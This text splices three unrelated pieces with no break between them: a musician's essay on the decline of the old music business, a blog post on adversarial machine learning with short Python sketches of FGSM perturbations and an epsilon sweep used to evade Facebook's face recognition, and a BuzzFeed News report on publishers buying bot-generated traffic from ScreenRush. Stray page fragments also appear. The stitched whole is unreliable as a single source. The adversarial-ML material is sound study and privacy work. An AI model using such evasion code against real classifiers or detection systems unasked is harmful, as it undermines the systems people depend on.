In the days of the old business model, there were successful predators at the top of the food chain, but the kids who made the music were hiding down in the bushes with our friends. The local model of music delivery, unlike the giant streaming info-combines that lord over today’s music world, had a strikingly flat hierarchy of striving characters: the club owners, record store clerks, college radio DJs, and rock critics who owed a thousand words to the local weekly. At closing time on any given night in the ’90s you could find any or all of these satellite scenesters mixed in among the proper musicians at the Art Bar in Dallas, behind Club Clearview. We all knew that there was a cutthroat cabal of music industry execs waiting on the top floor of a tower in Rockefeller Center to offer us a lopsided contract, but we also knew that we were the good guys, the proletariat to their bourgeoisie, the Rebel Alliance to their Empire. We had each other’s back. The worst thing we could be expected to do was steal a girlfriend from one of the Buck Pets or envy the Toadies their unexpected national radio play. Those were, as they say, the days.

The Talent Scouts are Bots

It’s all different now. My own observation of the current music industry is colored by my history with the extinct model. I can’t begin to imagine what it must be like to come up in this world of SoundCloud rappers and Swedish hit factories churning out auto-tuned EDM or whatever. Believe me, I’m keenly aware that even these two meager examples must make me sound impossibly old. My point is that if I was a fourteen-year-old depressive nowadays, I’m not sure what would even draw me into the world of music to begin with. The ability to record oneself in a bedroom represents an impressive flash-forward advance in technology, but it also is profoundly isolating. For starters, it negates the very human necessity of convincing small-time investors to fund a session, or the simultaneously joyful and agonizing experience of collaborating with the requisite technicians to make such a recording happen. In short, it eliminates people from the equation. And more to the point, it eliminates all the good people from the equation.

You’ve still got the execs in the tower in Rockefeller Center—only now all the lower floors that used to house the junior execs and the young A&R kids are crammed with barbed wire and land mines. The Artists & Repertoire department has been replaced by a bot that alerts the label chief when an artist reaches a predetermined number of Twitter followers or Facebook likes. This sort of micro-market calculation was once anathema to creativity—it’s the origin of the old punk-rock contempt for “the suits” who moved product on the AM airwaves. Today, however, an obsessive attention to online clicks and listens is all that an independent artist can rely on to outfox the system. Writing a song might now be less important to your success than paying for a hundred thousand imaginary account holders to follow you on social media.

That’s a lot of followers! So why do you feel so lonely? This hyperindividualist model of market predation seems directly aimed at one of the true joys of making music: a genuine, collaborative dedication to craft for its own sake.

Even though my own career benefited tremendously from the last gasp budgets of the old model, I’m not grandfathered out of the cynicism engendered by this new cutthroat world. As the old (and abundantly flawed) avenues of income are closed off entirely, our new music delivery system reroutes the great majority of returns from music-making back to the corporations.

Artists have never been good at maximizing the monetization of their work. And in the new money-challenged world of music, we’ve found ourselves cut out almost entirely. Even casual observers saw the shift from purchased music, which still managed to allot a small percentage of the profit to the artist, to music’s current state of literal worthlessness. Now the streaming services negotiate backroom deals with labels that dole out fees to artists in such minuscule sums that you would lose money by burning the gas it would require to drive to the bank to deposit the check in your account.

And the kids are listening on YouTube, a service that brilliantly shows advertisements before allowing the kids to consume their music. Does YouTube share the revenue generated by these commercials with the creators of the content? Does YouTube give the artists in question any say over whose ad might be attached to the art they created? Hell no. Why would they? They’re the Empire, remember? They’re just sitting in their dumbass Death Star counting their money.

It used to be that musicians could hope for the unexpected and sometimes tax-bracket elevating gift of mailbox money in the form of licensing fees paid by films, TV shows, and ad agencies. There’s a (perhaps apocryphal) old story about Nick Lowe, whose “(What’s So Funny About) Peace, Love & Understanding” was covered by some cheeseball on the soundtrack of the hit Hollywood movie The Bodyguard. In the story, Lowe (who’d recently been dumped by Warner Brothers, his longtime record label) stumbles out of his middle-class house in his bathrobe to retrieve the mail and discovers a check for a million dollars. A decade ago, a manager friend of mine who was haggling with an agency over a licensing fee told me he envisioned a future where instead of the company paying the artist to place the song in a commercial, it would work the other way around.

That’s our world now. In a post terrestrial radio era, music supervisors act as de facto A&R reps, and placement is one more thing artists are willing to give away pretty much for free.

When they’re feeling particularly ungenerous, the company will cut you out altogether. Google did that to me when they used the guitar riff from my song “Question” as the bed music in a commercial for one of the company’s crappy phones. Google hired an ad agency. The ad agency hired a jingle house, probably giving them “Question” as a reference track. Grateful for the work, some dude in a windowless room at the jingle house (probably himself another victim of the modern music biz; maybe he used to be in bands but was now trying to feed his kids by making innocuous instrumental music to go under Google ad voice-overs) re-recorded my riff, cleverly adding an extra note at the end of the progression—just enough to absolve his employer of any obligation to compensate me for having written the thing to begin with.

I did what any aggrieved artist should do when their work has been ripped off: I contacted my publishing company’s lawyers to threaten these digital brigands with a lawsuit. Within the ranks of the publishing company, it was unanimously agreed that we had Google over a barrel. But then they hired a musicologist who specialized in copyright infringement and he pointed out the almost imperceptible difference between the two recordings. His prediction was that it was possible but unlikely we could win in court. After my publishers sized up the odds of going against the great content leviathan, they advised me to drop the idea. I agreed reluctantly, and lost a few nights’ sleep thinking of how lucky the Nick Lowes of the world had been: here, some untold millions of ad viewers would be hearing a nearly note-for-note rendition of a song I wrote, and all I was getting in return was teeth-gnashing insomnia.

I considered making a video documenting the Google heist, featuring an A/B demonstration of the two versions of the song. I would certainly have prevailed in the court of public opinion at least. I could have told the story of how I’d written the song after spending a day in London falling in love with the woman I’d go on to marry, maybe show some pictures of our sweet kids that I’m busting my ass to feed in this barren new musical landscape. But in the end I didn’t want my career narrative to be overtaken by an Ahab-like quest for the leviathan’s unlikely destruction. I took a deep breath and let it go.

Battle of the Brands

There’s another less obvious casualty of the great digital enclosure of the music business: as Spotify, YouTube, Apple, Google, et al., hoover up nearly all the available profits, the people marooned on the production side of a revenue-starved business model are trapped in a perennial race to the bottom, just to get by. This means that even the best-intentioned people, who got into music for the best possible collaborative reasons, are forced to reposition themselves as small-time hustlers, whose younger selves would likely be appalled to encounter them in today’s always-be-closing mode.

This is far from an abstract proposition for me. When I was a kid, my grandmother introduced me to a local record storeowner she’d met in the little shopping center near her house. He must have seen some potential in my teenage flailing because he offered to manage me and eventually helped me put out my first little solo album. It was a sweet, heady time. I was learning so much, so quickly. The record itself reflects the larval stage of my development and I cherish it as one might a baby photo, but I don’t want it to be presented now alongside my adult work.

Fast forward thirty years, and this same early backer is haranguing me to make the record available on Spotify—an arrangement that, in addition to once more placing my career narrative in someone else’s profit-hungry hands, wouldn’t even yield him a serious cash return for his efforts. (See the preceding two thousand words.) The vitriol of his emails arguing against my right to determine the availability of this recording I’d made thirty years earlier stunned me. He threatened to sue me, claiming in essence that I was taking food from the mouths of his (now grown) children. Mind you, this is an album from the sales of which I had never seen one cent. I’d never complained. It had never occurred to me. And here we were, suddenly enemies? My sweet little grandmother could never have foreseen this.

The only way to carry over a lucrative music career in the prevailing market conditions is to puff oneself into a mammoth brand of the Taylor Swift/Kanye/Beyonce ilk. Bands, as over-romanticized as they may be by the rockers of my own generation as fearless anarcho-syndicalist collectives, no longer occupy a viable perch in the music ecosystem. Many of the new ones taking root in this top-heavy scrum to market online product have been systematically drained of all recognizable human traits—autotuned inside and out. As a dad seeing my kids fall for an indistinguishable blob of well-coiffed brandoid bands and Disney graduates, I’m not at all shocked that amid their many fast-germinating aesthetic and creative ambitions, my own offspring have never seriously taken it into their heads to pick up an instrument or start a band. The craft of music has entirely succumbed to its marketed spectacle.

There are, to be sure, many healthy exceptions to this rule. In garages and basements and dorm rooms across the country and around the world, bands are forming this very minute. They are arguing over favorite songs, greatest albums, Stratocaster versus Telecaster, and inevitably which one of the members is going to have to switch from guitar to bass. These hopeful young dreamers give me hope.

But we also shouldn’t kid ourselves: they are exceptions. For every one of these fledgling anarcho-syndicalist collectives, there are a thousand or a million kids alone in their bedrooms staring at Protools screens wondering what they have to do to get the Swedish cabal to write a hit song for them. They download a file onto Bandcamp or YouTube, start logging the hits, and pray.

And oh my God, that sounds so lonely.

Music saved my life. And musicians. And club owners, record store clerks, college radio DJs, and rock critics who owed a thousand words to the local weekly. We were often reckless, short-sighted, and profligate, but we were all in this together. And now there’s no more this.

Adversarial Learning for Good: On Deep Learning Blindspots

$
0
0

When I was first introduced to the idea of adversarial learning for security purposes by Clarence Chio's 2016 DEF CON talk and his related open-source library deep-pwning, I immediately started wondering about applications of the field, both for building robust and well-tested models and as a preventative measure against predatory machine learning practices in the field.

After reading more literature and utilizing several other open-source libraries, I realized most examples and research focused around malicious uses, such as sending spam or malware without detection, or crashing self-driving cars. Although I find this research interesting, I wanted to determine if adversarial learning could be used for "good".1

A brief primer on Adversarial Learning Basics

In case you haven't been following the explosion of adversarial learning in neural network research, papers and conferences, let's take a whirlwind tour of some concepts to get on the same page and provide further reading if you open up arXiv for fun on the weekend.

How Does It Work? What Does It Do?

Most neural networks optimize their weights and other variables by backpropagating the gradient of a loss function and applying an optimizer such as Stochastic Gradient Descent (SGD). Similarly to how we use the loss gradient to train our network, researchers found we can use this same machinery to find weak links in our network and adversarial examples that exploit them.
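
For reference, here is the kind of gradient step being repurposed, in a bare-bones sketch with nothing framework-specific about it:

# One-weight least-squares toy problem, trained with plain SGD.
def loss_grad(w, x, y):
    prediction = w * x
    return 2.0 * (prediction - y) * x      # d/dw of (w*x - y)^2

w, learning_rate = 0.0, 0.1
for x, y in [(1.0, 2.0), (2.0, 4.0), (3.0, 6.0)] * 20:   # stream of (input, target) pairs
    w -= learning_rate * loss_grad(w, x, y)
print(w)    # converges toward 2.0, the slope that fits the data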

To get an intuition of what is happening when we apply adversarial learning, let's look at a graphic which can help us visualize both the learning and adversarial generation.

Image: gradient descent graphic (Source Image)

Here we see a visual example of SGD, where we start our weights randomly or perhaps with a specific distribution. At the beginning our weight produces high error rates, putting it in the red area, but we'd like to end up at the global minimum in the dark blue area. We may, however, as the graphic shows, only end up in the local minimum with a slightly higher error rate on the right-hand side.

With adversarial sample generation, we are essentially trying to push that point back up the hill. We can't change the weight, of course, but we can change the input. If we can get this unit to misfire, to essentially misclassify the input, and a few other units to do the same, we can end up misclassifying the input entirely. This is our goal when doing adversarial learning and we can achieve it by using a series of algorithms proven to help us create specific perturbations given the input to fool the network. As you may notice, we also need to have a trained model we can apply these algorithms to and also test our success rate.
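
To make that concrete, here is a minimal FGSM-style sketch on a hand-rolled logistic "network" (plain numpy, not the cleverhans API; the weights and data are random stand-ins for a trained model):

import numpy as np

rng = np.random.default_rng(0)
w, b = rng.normal(size=8), 0.1          # a trained model would supply these
x, y = rng.normal(size=8), 1.0          # an input and its true label

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def loss_grad_wrt_input(x, y):
    p = sigmoid(w @ x + b)
    return (p - y) * w                  # d(cross-entropy)/dx for this model

epsilon = 0.25                          # perturbation budget
x_adv = x + epsilon * np.sign(loss_grad_wrt_input(x, y))

print("clean score:", sigmoid(w @ x + b))
print("adversarial score:", sigmoid(w @ x_adv + b))   # pushed toward the wrong class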

Historical Tour of Papers / Moments in Adversarial ML

The first prominent paper on adversarial examples came in the form of a technique to modify spam mail so it would be classified as legitimate mail, published by a group of researchers in 2005. The authors identified the features most important to Bayesian and linear classifiers and changed them to evade detection.

In 2007, NIPS had their first workshop on Machine Learning in Adversarial Environments for Computer Security which covered many techniques related primarily to linear classification but also other topics of interest in security such as network intrusion and bot detection.

In 2013, following other interesting research on the topic, Battista Biggio and several other researchers released a paper on Support Vector Machine (SVM) poisoning attacks. The researchers showed they could alter specific training data and essentially render the model useless against targeted attacks (or at least hamper it with the poisoned training). I highly recommend Biggio's later paper on pattern classifiers under attack; he has many other publications on techniques both to attack ML models and to defend against such attacks.

Photo: Example poisoning attack on a biometric dataset

In 2014, Christian Szegedy, Ian Goodfellow and several other Google researchers released their paper Intriguing Properties of Neural Networks, which outlined how to calculate carefully crafted perturbations of an image that allow an adversary to fool a neural network into misclassifying it. Ian Goodfellow later released a paper outlining an adversarial technique called the Fast Gradient Sign Method (FGSM), one of the most widely used and implemented attacks on neural network classifiers.

In 2016, Nicolas Papernot and several other researchers released a new technique that builds a saliency map from the Jacobian matrix of the model's outputs with respect to the input vector. He and Ian Goodfellow later released an open-source Python library called cleverhans, which implements FGSM and the Jacobian-based Saliency Map Attack (JSMA).

There have been many other papers and talks related to this topic since 2014, too many to cover here, but I recommend perusing some of the recent papers from the field and investigating areas of interest for yourself.

Malicious Attacks

As mentioned previously, malicious attacks have been studied at length. Here are a few notable studies:

There are plenty more, but these give you an idea of what has been studied in the space. Of course, alongside many of these studies the authors also studied counter-attacks. Security is ever a cat-and-mouse game, so learning how to defend against these types of attacks, particularly through adversary detection or adversarial training, is a research space in its own right.

Real-life Adversarial Examples

It has been debated whether adversarial learning will ever work against real-life objects or is only useful for static inputs such as images or files. In a recent paper, a group of researchers at MIT 3D-printed objects that fooled a video-based Inception network into "thinking", for example, that a turtle was a rifle. Their method applied techniques similar to FGSM across a range of possible alterations to the texture of the object itself.

How can I build my own adversarial samples?

Hopefully you are now interested in building some of your own adversarial samples. Maybe you are a machine learning practitioner looking to better defend your network, or perhaps you are just intrigued by the topic. Please do not use these techniques to send spam or malware! Really though... don't.

Okay, ethical use covered, let's check out the basic steps you'll need to go through when building adversarial samples:

  • Pick a problem / network type
    • Figure out a target or idea. Do some research on what is used "in production" for those types of tasks.
  • Research “state of the art” or publicly available pretrained models, or build your own
    • Read research papers in the space and watch talks from the target company. Determine whether you will build your own model or use a pretrained one.
  • (optional) Fine-tune your model
    • If using a pretrained model, take time to fine-tune it by retraining the last few layers (a minimal sketch follows this list).
  • Use a library: cleverhans, Foolbox, DeepFool, deep-pwning
    • Use one of the many open-source adversarial learning tools to generate adversarial input.
  • Test your adversarial samples on another (or your target) network
    • Not all problems and models are equally easy to fool. Test your best images on your local network, and possibly on one that hasn't seen the same training data. Then take the highest-confidence fooling inputs and pass them to the target network.
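
For the fine-tuning step, a minimal sketch of retraining only the last layers of a pretrained Keras model might look like the following. The two-class head, layer sizes and the commented-out training call are illustrative placeholders, not the exact configuration used in the experiments below.

    import tensorflow as tf
    from tensorflow.keras import layers, models

    # Load a pretrained backbone and freeze it, so only the new head gets trained.
    base = tf.keras.applications.InceptionV3(weights="imagenet",
                                             include_top=False,
                                             pooling="avg",
                                             input_shape=(299, 299, 3))
    base.trainable = False

    model = models.Sequential([
        base,
        layers.Dense(128, activation="relu"),
        layers.Dense(2, activation="softmax"),  # e.g. "cat" vs. "human"
    ])
    model.compile(optimizer="adam",
                  loss="sparse_categorical_crossentropy",
                  metrics=["accuracy"])
    # model.fit(train_ds, validation_data=val_ds, epochs=5)  # train_ds / val_ds: your labelled images

Freezing the backbone keeps the pretrained features intact and makes training feasible on a small, task-specific dataset.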

Want to get started right away? Here are some neat tools and libraries available in the open-source world for generating different adversarial examples.

  • cleverhans: Implementations of FGSM and JSMA in TensorFlow and Keras
  • deep-pwning: Generative drivers with examples for Semantic CNN, MNIST and CIFAR-10
  • Foolbox: Implementations of many algorithms with support for TensorFlow, Torch, Keras and MXNet
  • DeepFool: Torch-based implementation of the DeepFool paper (finds smaller, harder-to-detect perturbations than FGSM)
  • Evolving AI Lab: Fooling: Evolutionary algorithm for generating images that humans don't recognize but networks do, implemented in Caffe
  • Vanderbilt's adlib: scikit-learn-based fooling and poisoning algorithms for simple ML models.

There are many more, but these seemed like a representative sample of what is available. Have a library you think should be included? Ping me or comment!

Benevolent Uses of Adversarial Samples (a proposal)

I see the potential for numerous benevolent applications of these same techniques. The first idea that came to mind was evading facial recognition used for surveillance (or simply posting a photo without having your face automatically recognized).

Face Recognition

To test the idea, I retrained the final layers of the Keras pre-trained Inception V3 model to determine whether a photo is of a cat or a human. It achieved 99% accuracy in testing.2 Then I used the cleverhans library to calculate adversaries with FGSM. I tried varying levels of epsilon, uploading each result to Facebook. At low levels of perturbation, Facebook immediately recognized my photo as my face and suggested I tag myself. When I reached an epsilon of 0.21, Facebook stopped suggesting a tag (at that point my network was around 95% confident the photo was of a cat).

[Photo: me as a cat]

The produced image clearly shows perturbations. After speaking with a computer vision specialist, Irina Vidal Migallon3, I learned that Facebook may also be using Viola-Jones statistics-based face detection or some other statistical solution. If that is the case, it's unlikely we could fool it with a neural network while keeping the perturbations invisible to humans. But the experiment does show that we can use a neural network and adversarial learning techniques to fool face detection.4
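
As a rough illustration of the epsilon sweep described above, the loop below assumes the fgsm_perturb helper sketched earlier, a fine-tuned two-class model, and a single preprocessed image x scaled to [0, 1]. The class indices and the eps range are assumptions for illustration, not the exact values from my experiment.

    import numpy as np

    # Increase the perturbation strength until the model flips from "human" to "cat".
    for eps in np.arange(0.05, 0.30, 0.02):
        x_adv = fgsm_perturb(model, x, y_true=np.array([1]), eps=float(eps))  # index 1 assumed: "human"
        p_cat = float(model(x_adv).numpy()[0][0])                             # index 0 assumed: "cat"
        print(f"eps={eps:.2f}  P(cat)={p_cat:.2f}")
        # Save x_adv at each eps and test it against the face detector you care about.

The smallest eps that both convinces your local model and defeats the target detector is the one worth keeping, since larger values make the perturbations obvious to human viewers.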

Steganography

I had another idea while reading a great paper that used adversarial learning alongside evolutionary algorithms to generate images that are unrecognizable to humans but that a neural network classifies with 99% confidence. My idea is to apply this same image generation as a form of steganography.

Photo: Generated Images from MNIST dataset which the model classifies with high confidence as digits

In a time when it seems data we used to consider private (messages to friends and family on your phone, emails to your coworkers, etc.) can be used to sell you advertising or be inspected by border agents, I liked the idea of using a Generative Adversarial Network (GAN) to send messages adversarially. All the recipient would need is access to the training data and some information about the architecture. Of course, you could also send the model itself if you can secure the channel you use to send it. Then the recipient could use a self-trained or pretrained model to decode your message.

Some other benevolent adversarial learning ideas

Some other ideas I thought would be interesting to try are:

  • Adware “Fooling”
    • Can you trick your adware classifiers into thinking you are a different demographic? Perhaps keeping predatory advertising contained...
  • Poisoning Your Private Data
    • Using poisoning attacks, can you obscure your data?
  • Investigation of Black Box Deployed Models
    • By testing adversarial samples, can we learn more about the structure, architecture and use of ML systems of services we use?
  • ??? (Your Idea Here)

I am curious to hear others' ideas on the topic, so please reach out if you can think of an ethical and benevolent application of adversarial learning!

A Call to Fellow European Residents

I chose to speak on the #34c3 Resiliency track because the goal of the track resonated with me. It asked for new techniques we can use in the not-always-so-great world we live in, so that we can live closer to the lives we want (for ourselves and others).

For EU residents, the passage and upcoming implementation of the General Data Protection Regulation (or GDPR) means we will have more rights than most people in the world regarding how corporations use, store and mine our data. I suggest we use these rights actively and with a communal effort towards exposing poor data management and predatory practices.

In addition, adversarial techniques greatly benefit from more information. Knowing more about the system you are interacting with, including the possible features or model types used, will give you an advantage when crafting your adversarial examples.5 GDPR contains a section that has often been cited as a "Right to an Explanation." Although I have argued this is much more likely to be enforced as a "Right to be Informed," I suggest we EU residents use this portion of the regulation to inquire about the use of our data and about automated decisions made via machine learning at the companies whose services we use. If you live in Europe and are concerned about how a large company might be mining, using or selling your data, GDPR gives you more rights to determine whether this is the case. Let's use GDPR to the fullest and share the information gleaned from it with one another.

A few recent articles about GDPR caught my eye, mainly (my fellow) Americans complaining about implementation hassles and choosing to opt out. Despite the ignorant takes, I was heartened by several threads from other European residents pointing out the benefits of the regulation.

I would love to see GDPR lead to the growth of privacy-conscious, ethical data management companies. I would even be happy to pay for a service that promised not to sell my data. I want to live in a world where the "free market" allows ME, as a consumer, to choose a data manager with similar ethical views on the use of computers and data.

If your startup, company or service offers these types of protections, please write me. I am excited to see the growth of this mindset, both in Europe and hopefully worldwide.

My Talk Slides & Video

If you are interested in checking out my slides, here they are!

The talk will be recorded and I will follow up by posting the video here!

Slide References (in order)

Publishers Bought Millions of Website Visits They Found Out Were Fraudulent


This summer, Ozy.com, a news site that’s raised more than $35 million in funding from high-profile investors, published a group of articles in an ongoing series about how companies and entrepreneurs are trying to be a positive force in their communities. The content was created as part of a partnership with JPMorgan Chase, whose logo appears on each article.

The stories appeared to be a big hit: Between May and October, the sponsored content ranked among Ozy’s most-viewed articles, according to traffic data from analytics service SimilarWeb.

It’s the kind of success a publisher and brand would celebrate — except that the vast majority of traffic to the articles was in fact fraudulent, according to ad industry standards. Those stories, as well as other Ozy articles that carried ads from Amazon and Visa, received traffic that was purchased and delivered via a system that automatically loads specific webpages and redirects traffic between participating websites to quickly rack up views without any human action.

JPMorgan told BuzzFeed News it had no idea its sponsored content was receiving paid traffic from the source in question, and Ozy said it believed the audience was valid when it purchased it. Ozy has since told the bank that the resulting traffic was not counted as part of the campaign.

“We’re committed to only working with reputable and brand-safe publishers, and we don’t take this sort of thing lightly,” Erich Timmerman, a JPMorgan spokesperson, told BuzzFeed News.

The incident is the latest glimpse at the roots of a crisis of trust in online publishing. Blue-chip advertisers increasingly doubt whether their online ad spending reaches real audiences, and JPMorgan in particular has taken steps to ensure its ads only appear on quality sites. But even quality sites present risks.

Working in collaboration with ad-fraud consultancy Social Puncher, BuzzFeed News identified several other reputable publishers who also received the same invalid traffic during a similar timeframe as Ozy. They include Funny or Die, a video comedy site founded by actor Will Ferrell and several Hollywood producers; Community Newspaper Holdings Inc., a publisher of local newspapers in more than 20 states, which receives the traffic as part of a deal with video company Tout; Bustle Digital Group, a fast-growing digital publisher focused on young women; and PCMag, the venerable computing publication. All except CNHI say they have stopped using the traffic in question.

The audience delivery system used by these publishers was first detailed in an October BuzzFeed News investigation that revealed how subdomains on Myspace and more than 150 newspaper websites belonging to GateHouse Media generated massive amounts of fraudulent video views and ad impressions. (Both companies blamed partners who operated the offending subdomains and said they did not profit from fraudulent views or ads. They shut down the subdomains.)

How the system generates traffic through redirects between websites.

An estimated $16 billion will be lost to ad fraud this year, and a significant portion of that will go to criminals who use bots and other nefarious means to siphon money out of the digital ad ecosystem. But this example shows how legitimate publishers contribute to fraud when they knowingly or unknowingly use invalid traffic and other illegitimate means to grow their audiences and increase ad revenue.

“Illegitimate traffic sourcing occurs when a publisher pays a traffic supplier for a fixed number of visits to their website,” said a recent white paper about ad fraud published by the Alliance for Audited Media, a not-for-profit media auditing organization. “Publishers often buy traffic at the end of the month or quarter to ‘make its numbers.’ Traffic sellers often promise the publisher that the traffic is human and will pass through all ad fraud detection filters.”


In the case of Ozy, it subsequently told JPMorgan it used the paid traffic to try to grow an email subscription list, according to a source with knowledge of conversations between the companies.

BuzzFeed News provided Ozy with a detailed list of questions, in addition to video evidence showing how JPMorgan articles, as well as other content featuring premium ad units from Amazon and Visa, were receiving fraudulent traffic. The company replied with an emailed statement.

“We're always testing new ways to share our quality content with new, premium audiences. Unfortunately, our digital ecosystem harbors audience sources that don't always fit OZY's target, and in some cases, exhibit behavior that is not authentic,” the statement said. “We are constantly monitoring our network for fraudulent activity, and immediately suspend any traffic sources that would devalue OZY and our partnerships.”

The statement concluded, “We are proud to consistently overdeliver for our advertising partners across platforms, and it goes without saying that our partners only pay for quality delivery.”

As with Myspace, GateHouse, and Ozy, all publishers contacted by BuzzFeed News said they had no idea there were issues with the traffic in question, and that it was deemed safe by different third-party verification companies. Some publishers ceased using the traffic after reading the BuzzFeed News article that revealed its origins, the system generating automated redirects, and the fact that verification company DoubleVerify deemed it fraudulent after a detailed investigation. Prior to that, it appears the publishers did not investigate the origin of the traffic they sourced for their websites.

Mike Zaneis leads the Trustworthy Accountability Group, an ad industry initiative to fight fraud. He said a publisher is ultimately responsible for what happens on their site, and they need to engage in proper due diligence and monitoring.

“Publishers have a responsibility here to monitor their websites. If you see wild spikes in traffic coming from strange places, or at strange times, you have a responsibility there,” he told BuzzFeed News.

Sourcing traffic from ScreenRush

Ozy displays all the hallmarks of a premium digital publisher. But along with the illegitimate traffic going to JPMorgan’s and other content, data from SimilarWeb shows Ozy recently bought a portion of its audience from low-quality sources, including ad networks that specialize in pop-under browser windows that are opened on users as they visit other websites.

Ozy employs journalists to create content and says on its website that it reaches an aggregate of 40 million people a month through various channels. Data from Quantcast, a service Ozy uses to measure its traffic, says its website reaches 2.5 million people per month. Ozy also works with partners to syndicate its content and produces a TV show for PBS, among other non-web-based efforts. The PBS show is hosted by Ozy cofounder Carlos Watson, a former CNN commentator and MSNBC host who had a previous career as an entrepreneur.

Ozy’s investors include Silicon Valley luminaries Laurene Powell Jobs, Ron Conway, and David Drummond, a senior vice president of Alphabet, Google’s parent company. Ozy also received a $20 million investment from German media conglomerate Axel Springer in 2014. Earlier this year it raised an additional $10 million from GSV Capital Corp.

A few months after closing its latest financing, Ozy.com started receiving a significant increase in desktop visitors. Between June and October, roughly 2 million visits came from domains connected to a company called ScreenRush, according to SimilarWeb. This traffic was sent to specific articles on Ozy, many of which were part of the JPMorgan-sponsored content campaign. Other articles receiving visits via ScreenRush displayed special video ad units from Amazon and Visa, according to video compiled by ad-fraud consultancy Social Puncher. (BuzzFeed News contacted Visa and Amazon for comment but did not receive a reply.)

Using SimilarWeb, BuzzFeed News examined the most-popular content on Ozy between June and October and found that 8 of the 10 most-popular article pages received the vast majority of their visits using URLs that attributed the traffic to ScreenRush. For example (emphasis added):

This was also the case for an article on Ozy written by the head of property management for JPMorgan Chase Global Real Estate. These ScreenRush URLs accounted for nearly all traffic to the JPMorgan-sponsored content.

Vlad Shevtsov, director of investigations for Social Puncher, said his team documented behavior on Ozy that saw ScreenRush load and remain on a page for 90 seconds before the system automatically redirected to the next domain in the scheme.

"This is not sophisticated artificial traffic, just a dumb programming script," he said in an email. "The first question about these visits should be, How is it even possible that visitors went to other ScreenRush client sites if Ozy's pages have no links to any of these other sites?"

As detailed in the previous BuzzFeed investigation, the traffic ScreenRush sent to publishers largely originated from a group of more than 20 websites that purport to be online arcades. These sites all use the same design template and had their domains registered around the same time. The arcade sites also have nearly identical traffic patterns, as they are redirecting the same audience among them before passing it along to domains owned by ScreenRush — which, in turn, sends the traffic to publisher clients. (This method of redirecting traffic through domains to obscure its origins was detailed in a more recent BuzzFeed News story.)

Separate investigations by DoubleVerify and Social Puncher both determined the traffic coming from ScreenRush meets industry definitions for invalid, fraudulent traffic. They documented automated redirects being triggered by ScreenRush’s code without any human action on the page, as well as the presence of multiple video players running simultaneously.

“You’ve got websites that are getting some sort of inbound traffic and then this begins a cycle of autoplaying videos with ad pages refreshing and sometimes redirecting to other pages,” Roy Rosenfeld, DoubleVerify’s vice president of product management, previously told BuzzFeed News.

Instead of using video players to generate ad impressions, ScreenRush traffic was directed to Ozy pages that were part of specific campaigns. A spokesperson for DoubleVerify told BuzzFeed News it identified invalid traffic and ad impressions on a portion of Ozy’s users during the period the site received ScreenRush traffic.

Daniel Aharonoff, the general manager of ScreenRush, disputed the conclusions of DoubleVerify and Social Puncher, and the reporting of BuzzFeed News. He said the traffic coming through his system passes the filters of multiple verifications companies and is therefore human and valid.

“In all cases, the traffic is pre-screened by the ad-verification service chosen by the advertiser, and must be approved as valid in order to be delivered, so neither I nor any of the clients had any reason to believe the traffic wasn’t valid, at least until your article came out saying that DV had a different opinion on certain supply partners,” he said in an email.

He said the redirects documented by DoubleVerify and Social Puncher (as shown in the above video) are in fact the result of a real-time bidding process that determines which site the traffic goes to next, and that the content is shown to engaged, human users.

"We have a range of methods that assure us that supply is coming from 'real humans' and that the content discovery experience is in full 'viewability,'" he said. "Inherently this means if a 'user' wants to opt out they can 'simply' close the browser window that is present."

Aharonoff offered a lengthy email response and his explanation of the activity shown in the Social Puncher video. It can be read in full here. He also said BuzzFeed News and DoubleVerify are unfairly targeting his company.

“You are managing more than anything to scare partners with this singular view by DV which is hardly the industry standard,” Aharonoff said. He added that DoubleVerify is “clearly striving for relevance in a market dominated by their core competitors such as Moat & IAS among several others including various new entrants in the market.”

Moat did not reply to questions from BuzzFeed News about ScreenRush traffic, but did note that a website connected to Aharonoff’s company incorrectly claims it is a Moat customer. IAS also said its logo was improperly listed on that site. It also said it flagged several domains used by ScreenRush to refer traffic to clients for “high brand risk.”

Ozy stopped working directly with ScreenRush at the end of October. The next month, the site experienced a significant drop in desktop referral traffic, according to SimilarWeb. With ScreenRush gone, Ozy’s November traffic sources included ad networks that specialize in selling traffic generated via pop-under windows, according to SimilarWeb. These windows open behind the main browsing window as a user accesses the desired content. Publishers pay to have their content loaded in this pop-under window in the hope that the user will eventually see it. A recent BuzzFeed News story detailed how this form of low-quality traffic is often “laundered” through other domains before ending up on mainstream sites.

Ozy did not respond to a question about the use of pop-unders to generate traffic. It also didn't comment on the fact that until November it was also buying audience via go.bistroapi.com, a traffic source that Social Puncher investigated and found to be selling fake traffic to a variety of publishers.

Funny or Die and other sites got traffic, too

At the same time ScreenRush traffic was flowing to Ozy, it was also being directed to pages on funnyordie.com that featured branded content for clients such as KFC and Showtime.

Between July and October, SimilarWeb shows funnyordie.com received close to 900,000 desktop visits via ScreenRush. The comedy site was also a longtime purchaser of traffic from go.bistroapi.com, the highly suspect source that was also used by Ozy. Forensiq, an ad-fraud detection firm, told BuzzFeed News it detected high levels of nonhuman traffic on funnyordie.com over the summer.

In response to questions about its use of ScreenRush and go.bistroapi.com, Funny or Die’s head of public relations, Carolyn Prousky, sent an email statement.

“Once we found out there were discrepancies between our verification source and another report we discontinued the service as a precaution, though it was still passing other 3rd party verification sources as valid,” she said.

Prousky did not respond to a follow-up question about the use of ScreenRush traffic on branded campaign pages.

Romper.com, which is owned by Bustle Digital Media, also cited “discrepancies” as a reason for halting a test of ScreenRush traffic.

A company spokesperson said ScreenRush traffic wasn't registering properly in some of the site’s analytics systems, so they stopped using the traffic. Before Romper discontinued ScreenRush at the end of September, it was responsible for more than 90% of the site’s desktop referral traffic during the test, according to SimilarWeb.

One publisher that continues to receive ScreenRush traffic is CNHI, which owns more than 100 small newspapers in the US. It partnered with Tout to provide video on its sites, and Tout sources some traffic from ScreenRush for those videos.

Trinh Bui, Tout’s vice president of client services, told BuzzFeed News that ScreenRush traffic continues to pass third-party traffic filters. He said Tout turned off one traffic source in the wake of the BuzzFeed News story about Myspace and GateHouse after it tested high for invalid traffic.

As for the presence of automated redirects and multiple video players on the page, Bui said, “We expect the user to have a choice to watch videos or exit the video experience when they wish. When issues are flagged by partners or users, we immediately investigate the issues and work to resolve them as quickly as possible.”

CNHI did not respond to a request for comment.

A final prominent publisher that briefly used ScreenRush is pcmag.com. In the course of its initial reporting on ScreenRush, BuzzFeed News provided a list of ScreenRush domains to Augustine Fou, an independent ad-fraud researcher, so he could make an assessment of the system on his own. (He agreed with the conclusions of DoubleVerify and Social Puncher that the ScreenRush system generated fraudulent views and impressions.)

